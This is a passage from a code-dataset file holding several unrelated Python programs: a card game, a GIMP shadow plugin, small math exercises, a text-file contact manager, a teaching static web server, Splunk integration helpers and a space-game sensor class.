the', GetRank(ThisCard.Rank), 'of', GetSuit(ThisCard.Suit))\r\n    print()\r\n\r\ndef GetCard(ThisCard, Deck, NoOfCardsTurnedOver):\r\n    ThisCard.Rank = Deck[1].Rank\r\n    ThisCard.Suit = Deck[1].Suit\r\n    for Count in range(1, 52 - NoOfCardsTurnedOver):\r\n        Deck[Count].Rank = Deck[Count + 1].Rank\r\n        Deck[Count].Suit = Deck[Count + 1].Suit\r\n    Deck[52 - NoOfCardsTurnedOver].Suit = 0\r\n    Deck[52 - NoOfCardsTurnedOver].Rank = 0\r\n\r\ndef IsNextCardHigher(LastCard, NextCard):\r\n    Higher = False\r\n    if NextCard.Rank > LastCard.Rank:\r\n        Higher = True\r\n    if SameCardLower == True:\r\n        if NextCard.Rank == LastCard.Rank:\r\n            Higher = True\r\n    return Higher\r\n\r\ndef GetPlayerName():\r\n    print()\r\n    ValidName = False\r\n    while ValidName == False:\r\n        PlayerName = input('Please enter your name: ')\r\n        print()\r\n        if len(PlayerName) > 0:\r\n            ValidName = True\r\n    return PlayerName\r\n\r\ndef GetChoiceFromUser():\r\n    Choice = input('Do you think the next card will be higher than the last card (enter y or n)? ')\r\n    Choice = Choice.capitalize()\r\n    if Choice == 'Y' or Choice == 'Yes':\r\n        Choice = 'y'\r\n    elif Choice == 'N' or Choice == 'No':\r\n        Choice = 'n'\r\n    return Choice\r\n\r\ndef DisplayEndOfGameMessage(Score):\r\n    print()\r\n    print('GAME OVER!')\r\n    print('Your score was', Score)\r\n    if Score == 51:\r\n        print('WOW! You completed a perfect game.')\r\n    print()\r\n\r\ndef DisplayCorrectGuessMessage(Score):\r\n    print()\r\n    print('Well done! You guessed correctly.')\r\n    print('Your score is now ', Score, '.', sep='')\r\n    print()\r\n\r\ndef ResetRecentScores(RecentScores):\r\n    for Count in range(1, NO_OF_RECENT_SCORES + 1):\r\n        RecentScores[Count].Name = ''\r\n        RecentScores[Count].Score = 0\r\n        RecentScores[Count].Date = ''\r\n\r\ndef DisplayRecentScores(RecentScores):\r\n    ##BubbleSortScores(RecentScores)\r\n    print()\r\n    print('Recent Scores: ')\r\n    print()\r\n    print(\"{0:<10}{1:<10}{2:<10}\".format(\"Name\",\"Score\",\"Date\"))\r\n    for Count in range(1, NO_OF_RECENT_SCORES + 1):\r\n        print(\"{0:<10}{1:<10}{2:<10}\".format(RecentScores[Count].Name, RecentScores[Count].Score, RecentScores[Count].Date))\r\n    print()\r\n    print('Press the Enter key to return to the main menu')\r\n    input()\r\n    print()\r\n\r\ndef UpdateRecentScores(RecentScores, Score):\r\n    Date = datetime.datetime.now()\r\n    PlayerName = GetPlayerName()\r\n    FoundSpace = False\r\n    Count = 1\r\n    while (not FoundSpace) and (Count <= NO_OF_RECENT_SCORES):\r\n        if RecentScores[Count].Name == '':\r\n            FoundSpace = True\r\n        else:\r\n            Count = Count + 1\r\n    if not FoundSpace:\r\n        for Count in range(1, NO_OF_RECENT_SCORES):\r\n            RecentScores[Count].Name = RecentScores[Count + 1].Name\r\n            RecentScores[Count].Score = RecentScores[Count + 1].Score\r\n            RecentScores[Count].Date = RecentScores[Count + 1].Date\r\n        Count = NO_OF_RECENT_SCORES\r\n    RecentScores[Count].Name = PlayerName\r\n    RecentScores[Count].Score = Score\r\n    RecentScores[Count].Date = Date.strftime(\"%d/%m/%Y\")\r\n\r\ndef SaveScores(RecentScores):\r\n    # write fields in the same order that LoadScores reads them back: Name, Score, Date\r\n    with open('save_scores.txt', mode='w', encoding='UTF-8') as my_file:\r\n        for Count in range(1, NO_OF_RECENT_SCORES + 1):\r\n            my_file.write(str(RecentScores[Count].Name) + \"\\n\")\r\n            my_file.write(str(RecentScores[Count].Score) + \"\\n\")\r\n            my_file.write(str(RecentScores[Count].Date) + \"\\n\")\r\n\r\ndef LoadScores():\r\n    try:\r\n        with open(\"save_scores.txt\", mode=\"r\") as my_file:\r\n            counter = 1\r\n            count = 1\r\n            for line in my_file:\r\n                if (count - 1) != NO_OF_RECENT_SCORES:\r\n                    if counter == 1:\r\n                        RecentScores[count].Name = line.rstrip(\"\\n\")\r\n                    elif counter == 2:\r\n                        RecentScores[count].Score = int(line.rstrip(\"\\n\"))\r\n                    elif counter == 3:\r\n                        RecentScores[count].Date = line.rstrip(\"\\n\")\r\n                        count += 1\r\n                        counter = 0\r\n                    counter += 1\r\n    except IOError:\r\n        print()\r\n        print(\"Sorry No File Was Found\")\r\n        print()\r\n\r\ndef BubbleSortScores(RecentScores):\r\n    Swapped = True\r\n    while Swapped:\r\n        Swapped = False\r\n        for Count in range(1, NO_OF_RECENT_SCORES):\r\n            if RecentScores[Count + 1].Score > RecentScores[Count].Score:\r\n                temp = RecentScores[Count + 1]\r\n                RecentScores[Count + 1] = RecentScores[Count]\r\n                RecentScores[Count] = temp\r\n                Swapped = True\r\n\r\ndef PlayGame(Deck, RecentScores):\r\n    LastCard = TCard()\r\n    NextCard = TCard()\r\n    GameOver = False\r\n    GetCard(LastCard, Deck, 0)\r\n    DisplayCard(LastCard)\r\n    NoOfCardsTurnedOver = 1\r\n    while (NoOfCardsTurnedOver < 52) and (not GameOver):\r\n        GetCard(NextCard, Deck, NoOfCardsTurnedOver)\r\n        Choice = ''\r\n        while (Choice != 'y') and (Choice != 'n'):\r\n            Choice = GetChoiceFromUser()\r\n        DisplayCard(NextCard)\r\n        NoOfCardsTurnedOver = NoOfCardsTurnedOver + 1\r\n        Higher = IsNextCardHigher(LastCard, NextCard)\r\n        if (Higher and Choice == 'y') or (not Higher and Choice == 'n'):\r\n            DisplayCorrectGuessMessage(NoOfCardsTurnedOver - 1)\r\n            LastCard.Rank = NextCard.Rank\r\n            LastCard.Suit = NextCard.Suit\r\n        else:\r\n            GameOver = True\r\n    if GameOver:\r\n        
DisplayEndOfGameMessage(NoOfCardsTurnedOver - 2)\r\n HighScoreChoice = input(\"Do you want to Add your score to the High Score Table? (y/n): \")\r\n HighScoreChoice = HighScoreChoice.upper()\r\n if HighScoreChoice == 'Y':\r\n UpdateRecentScores(RecentScores, NoOfCardsTurnedOver - 2)\r\n else:\r\n DisplayEndOfGameMessage(51)\r\n HighScoreChoice = input(\"Do you want to Add your score to the High Score Table? (y/n): \")\r\n HighScoreChoice = HighScoreChoice.upper()\r\n if HighScoreChoice == 'Y':\r\n UpdateRecentScores(RecentScores, 51)\r\n\r\nif __name__ == '__main__':\r\n for Count in range(1, 53):\r\n Deck.append(TCard())\r\n for Count in range(1, NO_OF_RECENT_SCORES + 1):\r\n RecentScores.append(TRecentScore())\r\n Choice = ''\r\n while Choice != 'q':\r\n DisplayMenu()\r\n Choice = GetMenuChoice()\r\n if Choice == '1':\r\n LoadDeck(Deck)\r\n ShuffleDeck(Deck)\r\n PlayGame(Deck, RecentScores)\r\n elif Choice == '2':\r\n LoadDeck(Deck)\r\n PlayGame(Deck, RecentScores)\r\n elif Choice == '3':\r\n DisplayRecentScores(RecentScores)\r\n elif Choice == '4':\r\n ResetRecentScores(RecentScores)\r\n elif Choice == '5':\r\n OptionsMenu()\r\n elif Choice == '6':\r\n SaveScores(RecentScores)\r\n elif Choice == '7':\r\n LoadScores()\r\n","sub_path":"Skeleton Program.py","file_name":"Skeleton Program.py","file_ext":"py","file_size_in_byte":10255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"216938137","text":"#!/usr/bin/env python\r\nfrom gimpfu import *\r\nimport math\r\n\r\ndef window_shadow(image, shadow_angle, shadow_opacity, shadow_color, shadow_length):\r\n \r\n # start operation\r\n pdb.gimp_undo_push_group_start(image)\r\n \r\n # save default background color \r\n old_color = pdb.gimp_palette_get_background()\r\n \r\n # set background fill { FOREGROUND-FILL (0), BACKGROUND-FILL (1), WHITE-FILL (2), TRANSPARENT-FILL (3), PATTERN-FILL (4), NO-FILL (5) }\r\n pdb.gimp_palette_set_background(shadow_color)\r\n \r\n # save link original layer\r\n org_layer = image.active_layer\r\n\r\n # save position original layer\r\n org_x, org_y = org_layer.offsets\r\n\r\n # create blur shadow\r\n blur_shadow_Layer = gimp.Layer(\r\n image, # canvas\r\n \"tmp\", # name + my name\r\n image.width, # width\r\n image.height, # height\r\n 1, # type { RGB-IMAGE (0), RGBA-IMAGE (1), GRAY-IMAGE (2), GRAYA-IMAGE (3), INDEXED-IMAGE (4), INDEXEDA-IMAGE (5) }\r\n 40, # opacity\r\n 0); # mode { NORMAL-MODE (0), DISSOLVE-MODE (1), BEHIND-MODE (2), MULTIPLY-MODE (3), SCREEN-MODE (4), OVERLAY-MODE (5), DIFFERENCE-MODE (6), ADDITION-MODE (7), SUBTRACT-MODE (8), DARKEN-ONLY-MODE (9), LIGHTEN-ONLY-MODE (10), HUE-MODE (11), SATURATION-MODE (12), COLOR-MODE (13), VALUE-MODE (14), DIVIDE-MODE (15), DODGE-MODE (16), BURN-MODE (17), HARDLIGHT-MODE (18), SOFTLIGHT-MODE (19), GRAIN-EXTRACT-MODE (20), GRAIN-MERGE-MODE (21), COLOR-ERASE-MODE (22), ERASE-MODE (23), REPLACE-MODE (24), ANTI-ERASE-MODE (25) }\r\n \r\n # add blur shadow layer\r\n image.add_layer(blur_shadow_Layer, 1)\r\n \r\n # original layer selection\r\n pdb.gimp_selection_layer_alpha(org_layer)\r\n \r\n # fill layer selected\r\n pdb.gimp_edit_fill(blur_shadow_Layer, 1)\r\n \r\n # clear selection\r\n pdb.gimp_selection_clear(image)\r\n \r\n # create new layer\r\n layer = gimp.Layer(\r\n image, # canvas\r\n \"tmp\", # name + my name\r\n org_layer.width, # width\r\n org_layer.height, # height\r\n 1, # type { RGB-IMAGE (0), RGBA-IMAGE (1), GRAY-IMAGE (2), GRAYA-IMAGE (3), INDEXED-IMAGE (4), INDEXEDA-IMAGE (5) }\r\n 100, # 
opacity\r\n        0); # mode { NORMAL-MODE (0), DISSOLVE-MODE (1), BEHIND-MODE (2), MULTIPLY-MODE (3), SCREEN-MODE (4), OVERLAY-MODE (5), DIFFERENCE-MODE (6), ADDITION-MODE (7), SUBTRACT-MODE (8), DARKEN-ONLY-MODE (9), LIGHTEN-ONLY-MODE (10), HUE-MODE (11), SATURATION-MODE (12), COLOR-MODE (13), VALUE-MODE (14), DIVIDE-MODE (15), DODGE-MODE (16), BURN-MODE (17), HARDLIGHT-MODE (18), SOFTLIGHT-MODE (19), GRAIN-EXTRACT-MODE (20), GRAIN-MERGE-MODE (21), COLOR-ERASE-MODE (22), ERASE-MODE (23), REPLACE-MODE (24), ANTI-ERASE-MODE (25) }\r\n    \r\n    # set layer position\r\n    layer.translate(org_x, org_y)\r\n\r\n    # add layer to image\r\n    image.add_layer(layer, 2)\r\n\r\n    # original layer selection\r\n    pdb.gimp_selection_layer_alpha(org_layer)\r\n\r\n    # fill layer selected\r\n    pdb.gimp_edit_fill(layer, 1)\r\n    \r\n    # clear selection\r\n    pdb.gimp_selection_clear(image)\r\n    \r\n    # copy first layer\r\n    copyLayer = layer.copy()\r\n    \r\n    # set step move layer\r\n    angle = math.pi / 180 * shadow_angle\r\n    sx = math.cos(angle)\r\n    sy = math.sin(angle)\r\n\r\n    # set layer position\r\n    xp = sx\r\n    yp = sy\r\n    \r\n    for i in range(shadow_length):\r\n        xi = int(round(xp, 1))\r\n        yi = int(round(yp, 1))\r\n        \r\n        # move new layer\r\n        copyLayer.translate(xi, yi)\r\n\r\n        # add to image new layer\r\n        image.add_layer(copyLayer)\r\n\r\n        # merge down layer\r\n        mergedLayer = pdb.gimp_image_merge_down(image, copyLayer, 0)\r\n\r\n        # create new pattern from layer\r\n        copyLayer = mergedLayer.copy()\r\n\r\n        # create position from new layer\r\n        xp += sx\r\n        yp += sy\r\n    \r\n    # free the last working copy, which was never attached to the image\r\n    gimp.delete(copyLayer)\r\n    \r\n    # set opacity new layer - shadow\r\n    mergedLayer.opacity = shadow_opacity\r\n    \r\n    # create blur shadow\r\n    pdb.gimp_selection_layer_alpha(mergedLayer)\r\n    pdb.plug_in_gauss_iir(image, blur_shadow_Layer, shadow_length * 10, True, True)\r\n    \r\n    # merge shadows\r\n    resultShadowLayer = pdb.gimp_image_merge_down(image, blur_shadow_Layer, 0)\r\n    resultShadowLayer.name = org_layer.name + \" #shadow\"\r\n    \r\n    # auto crop shadow layer\r\n    pdb.plug_in_autocrop_layer(image, resultShadowLayer)\r\n    \r\n    # set last background color\r\n    pdb.gimp_palette_set_background(old_color)\r\n    \r\n    # clear last selection\r\n    pdb.gimp_selection_clear(image)\r\n    \r\n    # end operation\r\n    pdb.gimp_undo_push_group_end(image)\r\n\r\n# register plugin\r\nregister(\r\n    \"python_fu_window_shadow\",\r\n    \"window shadow plugin\",\r\n    \"window shadow plugin\",\r\n    \"window shadow plugin\",\r\n    \"window shadow plugin\",\r\n    \"2016\",\r\n    \"Window shadow\",\r\n    \"*\",\r\n    [\r\n        (PF_IMAGE, 'image', 'Image', None),\r\n        (PF_SLIDER, 'shadow_angle', 'Angle', 45, (-180, 180, 0)),\r\n        (PF_SLIDER, 'shadow_opacity', 'Opacity', 10, (0, 100, 0)),\r\n        (PF_COLOR, 'shadow_color', 'Set color', (0.0, 0.0, 0.0, 1.0)),\r\n        (PF_INT, 'shadow_length', 'Length', 10)\r\n    ],\r\n    [],\r\n    window_shadow,\r\n    menu=\"/Filters/Languages/Python-Fu\")\r\n\r\nmain()\r\n","sub_path":"window_shadow.py","file_name":"window_shadow.py","file_ext":"py","file_size_in_byte":5388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"147930723","text":"import numpy as np\n\ndef poly(p, x, y):\n    # accept plain Python lists as well as arrays\n    x = np.asarray(x, dtype=float)\n    y = np.asarray(y, dtype=float)\n    Nx = len(x)\n    Np = (p+1)*(p+2)//2\n    s = -np.ones(Nx)\n    t = y\n    dex = np.abs(y-1) > 1e-10\n    s[dex] = 2*(1+x[dex])/(1-y[dex])-1\n\n    V = np.zeros((Nx,Np))\n    ll = 0\n    tfact = np.ones(Nx)\n\npoly(1, [0], [0])\n","sub_path":"Code/Python/poly.py","file_name":"poly.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"52731454","text":"#-*- coding:utf-8 -*-\nfrom random import random\nnum=int(input('실험 횟수는 ? '))\ncnt=0.0\nfor i in range(num):\n    x=random()\n    y=random()\n    if x*x + y*y <= 1:\n        cnt+=1\nprint((cnt/num)*4)\n","sub_path":"python/AI/monte_pi2.py","file_name":"monte_pi2.py","file_ext":"py","file_size_in_byte":202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"538425842","text":"f = open(\"users.txt\",\"r\")\r\n# print(f.read())\r\n\r\n\r\nl= []\r\nmasterlist = {}\r\ncounter= 0\r\niden= 0\r\n\r\nfor x in f:\r\n\tl.append((x).strip(\"\\n\"))\r\n\tcounter += 1\r\n\tif counter == 7:\r\n\t\tprint(l)\r\n\t\tmasterlist[iden] = l\r\n\t\tiden += 1\r\n\t\tcounter= 0\r\n\t\tl=[]\r\n\r\nprint(masterlist)\r\n#creates lists within a dictionary\r\n\r\n\r\ndef nextnumber():\r\n\tfor x in range(1, 1000000):\r\n\t\tif x not in masterlist:\r\n\t\t\treturn x\r\n\t\tb = masterlist[x]\r\n\t\tif x != int(b[0]):\r\n\t\t\treturn x\r\n\r\n\r\nadd = input(\"Would you like to add a person details?: \") #input for whether the person would like to add details \r\nadd = add.lower() #input to lower case\r\n\r\nif add == \"yes\":\r\n\ta = nextnumber() #AUTO increment version of ID\r\n\tprint(\"ID: \", a)\r\n\tb = input(\"First Name: \") #input gets saved as b and get written on the next line\r\n\tc = input(\"Second Name: \")\r\n\td = input(\"Address line 1: \")\r\n\te = input(\"Address line 2: \")\r\n\tf = input(\"Post code: \")\r\n\tg = input(\"Telephone Number: \")\r\n\ta = str(a) + \"\\n\" #convert the ID number to a string so it can be written like the other fields\r\n\tb= b +\"\\n\"\r\n\tc= c +\"\\n\"\r\n\td= d +\"\\n\"\r\n\te= e +\"\\n\"\r\n\tf= f +\"\\n\"\r\n\tg= g +\"\\n\"\r\n\r\n\tt = open(\"users.txt\", \"a\")\r\n\tt.write(a)\r\n\tt.write(b) # writes on its own line \r\n\tt.write(c)\r\n\tt.write(d)\r\n\tt.write(e)\r\n\tt.write(f)\r\n\tt.write(g)\r\n\tt.close()\r\n\r\n\r\n# else:\r\n# \tcontinue\r\n\r\nz= len(masterlist)\r\ny= z*7\r\n\r\ndef check(n):\r\n\tfound = False\r\n\th = open(\"users.txt\", \"r\")\r\n\tli = []\r\n\tfor i in range(y):\r\n\t\tli.append((h.readline()).strip(\"\\n\"))\r\n\r\n\tfor m in li:\r\n\t\tif m == n:\r\n\t\t\tfound = True\r\n\t\t\tbreak\r\n\th.close()\r\n\treturn found\r\n\r\n\r\ndlt = input(\"Would you like to delete someone off the list?: \")\r\ndlt = dlt.lower()\r\n\r\n# print(\"-----------\")\r\n# print(masterlist)\r\n# print(masterlist[1])\r\n\r\nprint(\"-----------\")\r\n# dlt = \"yes\"\r\nif dlt == \"yes\":\r\n\ta = input(\"ID: \")\r\n\tif check(a) == True:\r\n\t\tc= int(a) -1\r\n\t\tb = masterlist[c]\r\n\t\tprint(b)\r\n\t\tdel masterlist[c]\r\n\t\th = open(\"users.txt\", \"r\")\r\n\r\nprint(\"Menu\")\r\nprint(\"1 - Identification Number\")\r\nprint(\"2 - Firstname\")\r\nprint(\"3 - Surname\")\r\nprint(\"4 - Address 1\")\r\nprint(\"5 - Address 2\")\r\nprint(\"6 - Postcode\")\r\nprint(\"7 - Telephone Number\")\r\n\r\n\r\nsearch = int(input(\"Search by: \"))\r\n\r\nif search == 1:\r\n\ta = input(\"ID: \")\r\n\tif a in masterlist:\r\n\t\ta= int(a)-1\r\n\t\tprint(masterlist[a])\r\nelif search == 2:\r\n\ta = input(\"Firstname: \")\r\n\tif a in masterlist:\r\n\t\tfor x in masterlist:\r\n\t\t\tb = masterlist[x]\r\n\t\t\tif b.index(a) == 1:\r\n\t\t\t\tprint(b)\r\n\r\nelif search == 3:\r\n\ta = input(\"Surname: \")\r\n\tif a in 
masterlist:\r\n\t\tfor x in masterlist:\r\n\t\t\tb = masterlist[x]\r\n\t\t\tif b.index(a) == 2:\r\n\t\t\t\tprint(b)\r\nelif search == 4:\r\n\ta = input(\"Address Line 1: \")\r\n\tif a in masterlist:\r\n\t\tfor x in masterlist:\r\n\t\t\tb = masterlist[x]\r\n\t\t\tif b.index(a) == 3:\r\n\t\t\t\tprint(b)\r\nelif search == 5:\r\n\ta = input(\"Address Line 2: \")\r\n\tif a in masterlist:\r\n\t\tfor x in masterlist:\r\n\t\t\tb = masterlist[x]\r\n\t\t\tif b.index(a) == 4:\r\n\t\t\t\tprint(b)\r\nelif search == 6:\r\n\ta = input(\"Post Code: \")\r\n\tif a in masterlist:\r\n\t\tfor x in masterlist:\r\n\t\t\tb = masterlist[x]\r\n\t\t\tif b.index(a) == 5:\r\n\t\t\t\tprint(b)\r\nelif search == 7:\r\n\ta = input(\"Telephone Number: \")\r\n\tif a in masterlist:\r\n\t\tfor x in masterlist:\r\n\t\t\tb = masterlist[x]\r\n\t\t\tif b.index(a) == 6:\r\n\t\t\t\tprint(b)\r\nelse:\r\n\tprint(\"Try Again, Read Menu\")\r\n\r\n\r\n# user = open(\"users.txt\",\"r\")\r\n\r\n# user2 = copy(user)\r\n# print(l)\r\n# print(\"--------\")\r\n# print(masterlist)\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Lydia.py","file_name":"Lydia.py","file_ext":"py","file_size_in_byte":3316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"246362160","text":"\"\"\"\n3. Массив размером 2m + 1, где m – натуральное число, заполнен случайным образом.\nНайдите в массиве медиану. Медианой называется элемент ряда, делящий его на\nдве равные части: в одной находятся элементы, которые не меньше медианы,\nв другой – не больше медианы.\n\nЗадачу можно решить без сортировки исходного\nмассива.\n\nНо если это слишком сложно, то используйте метод сортировки,\nкоторый не рассматривался на уроках: Шелла, Гномья, ...\n\narr[m]\nfrom statistics import median\n\"\"\"\nimport random\n\n\"\"\"\nвариант решения без сортировки\n\"\"\"\nm = 5\norig_list = [random.randint(0, 50) for _ in range(2 * m + 1)]\nprint(f'Оригинальный массив: {orig_list}')\n\nfor i in range(len(orig_list)):\n left = []\n right = []\n for k in range(len(orig_list)):\n if i == k:\n continue\n if orig_list[k] < orig_list[i]:\n left.append(orig_list[k])\n elif orig_list[k] > orig_list[i]:\n right.insert(0, orig_list[k])\n else:\n if len(left) > len(right):\n right.append(orig_list[k])\n else:\n left.insert(0, orig_list[k])\n print(f'Итерация: {i + 1}\\n\\tЛевая часть: {left}\\n\\tПравая часть: {right}\\n\\n')\n if len(left) == len(right) == m:\n print(f'Медиана ====> {orig_list[i]}')\n break\n left.clear()\n right.clear()\n\n\"\"\"\nвариант с использованием гномьей сортировки\n\"\"\"\n\n\ndef gnome_sort(orig_list):\n i = 1\n j = 2\n while i < len(orig_list):\n if orig_list[i - 1] < orig_list[i]:\n i = j\n j += 1\n else:\n orig_list[i], orig_list[i - 1] = orig_list[i - 1], orig_list[i]\n i -= 1\n if i == 0:\n i = j\n j += 1\n return orig_list\n\n\nm = 5\norig_list = [random.randint(0, 50) for _ in range(2 * m + 1)]\nsorted_list = gnome_sort(orig_list)\nprint(f'Оригинальный массив: {orig_list}\\n\\tОтсортированный массив: {sorted_list}')\nif sorted_list[m - 1] <= sorted_list[m] <= sorted_list[m + 1]:\n print(f'Медиана ====> {sorted_list[m]}')\n","sub_path":"lesson7/task_3.py","file_name":"task_3.py","file_ext":"py","file_size_in_byte":2540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"191682997","text":"import socket\nimport os\n\n\ndef main():\n # 创建tcp服务端套接字\n tcp_server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n # 设置端口号复用,程序退出端口号立即释放\n 
tcp_server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, True)\n # 绑定端口号\n tcp_server_socket.bind((\"\", 8000))\n # 设置监听\n tcp_server_socket.listen(128)\n # 循环等待接受客户端的连接请求\n while True:\n # 等待接受客户端的连接请求\n new_socket, ip_port = tcp_server_socket.accept()\n # 代码执行到此,说明连接建立成功\n # 接收客户端的请求信息\n recv_data = new_socket.recv(4096)\n # 判断接收的数据长度是否为0\n if len(recv_data) == 0:\n new_socket.close()\n return\n\n # 对二进制数据进行解码\n recv_content = recv_data.decode(\"utf-8\")\n print(recv_content)\n\n # 对数据按照空格进行分割\n request_list = recv_content.split(\" \", maxsplit=2)\n # 获取请求的资源路径\n request_path = request_list[1]\n print(request_path)\n\n # 判断请求的是否是根目录,如果是根目录设置返回的信息\n if request_path == \"/\":\n request_path = \"/index.html\"\n\n # 1. os.path.exits\n # os.path.exists(\"static/\" + request_path)\n # 2. try-except\n\n # 打开文件读取文件中的数据, 提示:这里使用rb模式,兼容打开图片文件\n with open(\"static\" + request_path, \"rb\") as file: # 这里的file表示打开文件的对象\n file_data = file.read()\n # 提示: with open 关闭文件这步操作不用程序员来完成,系统帮我们来完成\n\n # 代码执行到此,说明文件存在,返回200状态信息\n # 响应行\n response_line = \"HTTP/1.1 200 OK\\r\\n\"\n # 响应头\n response_header = \"Server: PWS/1.0\\r\\n\"\n # 响应体\n response_body = file_data\n\n # 把数据封装成http 响应报文格式的数据\n response = (response_line +\n response_header +\n \"\\r\\n\").encode(\"utf-8\") + response_body\n\n # 发送给浏览器的响应报文数据\n new_socket.send(response)\n\n # 关闭服务于客户端的套接字\n new_socket.close()\n\n\n# 判断是否是主模块的代码\nif __name__ == '__main__':\n main()\n\n\n\n\n","sub_path":"03-Python高级语法/2019-版本/01-网络编程/day02-{HTTP协议和静态Web服务器}/04-代码/day06/02-静态web服务器-返回指定页面数据.py","file_name":"02-静态web服务器-返回指定页面数据.py","file_ext":"py","file_size_in_byte":2481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"602220039","text":"# -*- coding: utf-8 -*-\n#\n# (c) Copyright IBM Corp. 2010, 2022. 
All Rights Reserved.\n#\nfrom logging import getLogger\nfrom resilient_lib import validate_fields, IntegrationError\nfrom fn_splunk_integration.util.splunk_utils import SplunkServers\nfrom fn_splunk_integration.util.splunk_constants import PACKAGE_NAME, GET_FIELD, UPDATE_FIELD\n\nLOG = getLogger(__name__)\n\ndef make_query_string(query_string, params):\n \"\"\"\n Substitute parameters into the query\n :param query: Input query with params\n :param params: Values used to substitute\n :return: (str) Query with params substitued\n \"\"\"\n\n index = 1\n for param in params:\n if param:\n to_replace = \"%%param%d%%\" % index\n query_string = query_string.replace(to_replace, param)\n index += 1\n\n return query_string\n\ndef make_item_dict(params):\n \"\"\"\n Use the params List to build a dict\n :param params: Parameter list\n :return: dict\n \"\"\"\n ret = {}\n\n list_len = len(params)\n if list_len%2 != 0:\n raise IntegrationError(str(params))\n\n index = 0\n while index < list_len:\n if params[index]:\n # Allow the value (params[index + 1] here) to be empty (None)?\n # Let Splunk to return an error if it does not support empty value\n ret[params[index]] = params[index + 1]\n else:\n # If key is None, we can not add it to the dictionary\n LOG.debug(\"The {}th key is None with value {}\".format(str(index), str(params[index + 1])))\n index += 2\n\n return ret\n\ndef get_servers_list(opts):\n \"\"\"\n Used for initilizing or reloading the options variable\n :param opts: List of options\n :return: List of splunk servers\n \"\"\"\n servers_list = {}\n\n options = opts.get(PACKAGE_NAME, {})\n\n if options: # If no label given [fn_splunk_integration]\n server_list = {PACKAGE_NAME}\n else: # If label given [fn_splunk_integration:label]\n servers = SplunkServers(opts, options)\n server_list = servers.get_server_name_list()\n\n # Creates a dictionary that is filled with the splunk servers\n # and there configurations \n for server_name in server_list:\n servers_list[server_name] = opts.get(server_name, {})\n validate_fields([\"host\", \"port\", \"username\", \"splunkpassword\"], servers_list[server_name])\n\n return servers_list\n\ndef update_splunk_servers_select_list(servers_list, res_rest_client, field_name):\n \"\"\"\n Update values in splunk_servers select field\n :param servers_list: List of splunk servers in app.config\n :param res_rest_client: SOAR rest client connection\n :param field_name: Activity field name\n :return: None\n \"\"\"\n\n # Create list of splunk server labels\n server_name_list = []\n for server in servers_list:\n if \":\" in server:\n server_name_list.append(server[server.index(\":\")+1:])\n else:\n server_name_list.append(server)\n\n try:\n payload = res_rest_client.get(GET_FIELD.format(field_name))\n\n if type(payload) == list or payload.get(\"input_type\") != \"select\":\n return None\n\n # Create payload \n if server_name_list:\n\n # Put payload with no values to delete old values\n del payload[\"values\"]\n res_rest_client.put(UPDATE_FIELD.format(field_name), payload)\n\n # Add values to the payload\n payload[\"values\"] = [\n {\"label\": str(value), \"enabled\": True, \"hidden\": False}\n for value in server_name_list\n ]\n # Put payload with values to SOAR\n res_rest_client.put(UPDATE_FIELD.format(field_name), payload)\n\n except Exception as err_msg:\n LOG.warning(\"Action failed: {} error: {}\".format(field_name, err_msg))\n raise IntegrationError(\"Error while updating action field: 
{}\".format(field_name))\n","sub_path":"fn_splunk_integration/fn_splunk_integration/util/function_utils.py","file_name":"function_utils.py","file_ext":"py","file_size_in_byte":3883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"149027292","text":"#This code is based on HSSensor.cpp and HSSensor.h from the HSpace project.\r\nfrom __future__ import absolute_import, division\r\n\r\nfrom random import randint\r\nfrom math import sqrt\r\nfrom attr import attr, attributes\r\n\r\nfrom .. import signals\r\nfrom ..helpers import event, type_filter\r\n\r\nfrom .system import System, SystemInstance\r\n\r\n@attributes(slots=True)\r\nclass Sensor (System):\r\n\t\"\"\" This class represents a sensor system. \"\"\"\r\n\tstrength = attr(default=0)\r\n\tdimensional = attr(default=False)\r\n\ttable = \"sensors\"\r\n\r\n\t@classmethod\r\n\tdef display_name(cls):\r\n\t\treturn \"Sensor\"\r\n\r\n@attributes\r\nclass SensorInstance (SystemInstance):\r\n\t\"\"\" This represents an instance of the sensor system. \"\"\"\r\n\r\n\tdef cycle(self):\r\n\t\tfrom pyspace import systems\r\n\t\tfrom pyspace import space_objects\r\n\t\tfrom pyspace.systems.computer import SensorContact\r\n\t\tif not self.current_power:\r\n\t\t\treturn\r\n\t\tsuper(SensorInstance, self).cycle()\r\n\t\tcomputer = self.ship.find_computer()\r\n\t\tif computer is None:\r\n\t\t\treturn\r\n\t\tif not computer.is_online():\r\n\t\t\treturn\r\n\t\tmy_univ = self.ship.universe\r\n\t\tif my_univ is None:\r\n\t\t\treturn\r\n\t\tif self.ship.landed_loc is not None:\r\n\t\t\treturn\r\n\t\tdd_engaged = self.ship.has_dd_engaged\r\n\t\t#nebulae = type_filter(my_univ.objects, space_objects.Nebula)\r\n\t\tnebulae = [] \r\n\r\n\t\t#Calculate the nebula effect for an object.\r\n\t\tdef calc_nebula_effect(obj):\r\n\t\t\tnebula_effect = 1.0\r\n\t\t\tfor nebula in nebulae:\r\n\t\t\t\tdiff_vec = nebula.location - obj.location\r\n\t\t\t\tif diff_vec.length < nebula.radius:\r\n\t\t\t\t\tfalloff = 1.0 - nebula.fallof * (diff_vec.length / nebula.radius)\r\n\t\t\t\t\tnebula_effect *= nebula.sensor_effect * falloff\r\n\t\t\treturn nebula_effect\r\n\r\n\t\t#Get local nebula effect.\r\n\t\tlocal_nebula_effect = calc_nebula_effect(self.ship)\r\n\r\n\t\t#Detect objects in the same universe.\r\n\t\tin_range = my_univ.objects_around(self.ship.location, range=self.strength)\r\n\t\tcontact_objects = 